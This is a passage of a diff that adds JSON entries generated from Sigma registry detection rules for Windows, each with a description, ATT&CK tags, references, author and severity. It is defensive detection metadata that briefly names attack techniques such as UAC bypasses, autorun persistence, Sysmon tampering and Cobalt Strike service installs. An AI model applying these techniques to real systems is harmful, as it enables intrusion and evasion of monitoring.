"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ], + "creation_date": "2021/12/30", + "filename": "registry_set_add_port_monitor.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "uuid": "092af964-4233-4373-b4ba-d86ea2890288", + "value": "Add Debugger Entry To AeDebug For Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/aedebug.html", + "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_aedebug_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "value": "Allow RDP Remote Assistance Feature", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitmate use of the feature (alerts should be investigated either way)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "9df5f547-c86a-433e-b533-f2794357e242", + "value": "Classes Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_classes.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + 
"falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "value": "Common Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://persistence-info.github.io/Data/userinitmprlogonscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_common.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "value": "CurrentControlSet Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + 
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "value": "CurrentVersion Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + 
"falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "value": "CurrentVersion NT Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "value": "Internet Explorer Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + 
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "value": "Office Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_office.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for 
legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "value": "Session Manager Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "value": "System Scripts Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "value": "WinSock2 Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "value": "Wow6432Node CurrentVersion Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "value": "Wow6432Node Classes Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", + "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for 
legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "uuid": "83314318-052a-4c90-a1ad-660ece38d276", + "value": "Blackbyte Ransomware Registry", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/01/24", + "filename": "registry_set_blackbyte_ransomware.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Bypasses User Account Control using a fileless method", + "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "value": "Bypass UAC Using DelegateExecute", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2022/01/05", + "filename": "registry_set_bypass_uac_using_delegateexecute.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + 
], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "value": "Bypass UAC Using Event Viewer", + "meta": { + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ], + "creation_date": "2022/01/05", + "filename": "registry_set_bypass_uac_using_eventviewer.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", + "value": "Bypass UAC Using SilentCleanup Task", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", + "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2022/01/06", + "filename": 
"registry_set_bypass_uac_using_silentcleanup_task.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", + "value": "Changing RDP Port to Non Standard Number", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ], + "creation_date": "2022/01/01", + "filename": "registry_set_change_rdp_port.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Hides the file extension through modification of the registry", + "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", + "value": "IE Change Domain Zone", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ], + "creation_date": "2022/01/22", + "filename": 
"registry_set_change_security_zones.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "value": "Disable Sysmon Event Logging Via Registry", + "meta": { + "refs": [ + "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", + "https://youtu.be/zSihR3lTf7g", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/07/28", + "filename": "registry_set_change_sysmon_driver_altitude.yml", + "author": "B.Talebi", + "level": "high", + "falsepositive": [ + "Legitimate driver altitude change to hide sysmon" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "value": "Change Winevt Event Access Permission Via Registry", + "meta": { + "refs": [ + "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/09/17", + "filename": "registry_set_change_winevt_channelaccess.yml", + 
"author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "value": "CHM Helper DLL Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_chm_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1133" + ], + "creation_date": "2021/12/28", + "filename": "registry_set_chrome_extension.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe 
can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "value": "CobaltStrike Service Installations in Registry", + "meta": { + "refs": [ + "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2021/06/29", + "filename": "registry_set_cobaltstrike_service_installs.yml", + "author": "Wojciech Lesicki", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", + "value": "COM Hijack via Sdclt", + "meta": { + "refs": [ + "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", + "https://www.exploit-db.com/exploits/47696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "creation_date": "2020/09/27", + "filename": "registry_set_comhijack_sdclt.yml", + "author": "Omkar Gudhate", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling the CrashDump per 
registry (as used by HermeticWiper)", + "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "value": "CrashControl CrashDump Disabled", + "meta": { + "refs": [ + "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" + ], + "tags": [ + "attack.t1564", + "attack.t1112" + ], + "creation_date": "2022/02/24", + "filename": "registry_set_crashdump_disabled.yml", + "author": "Tobias Michalski", + "level": "medium", + "falsepositive": [ + "Legitimate disabling of crashdumps" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "value": "Service Binary in Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/05/02", + "filename": "registry_set_creation_service_susp_folder.yml", + "author": "Florian Roth, frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } 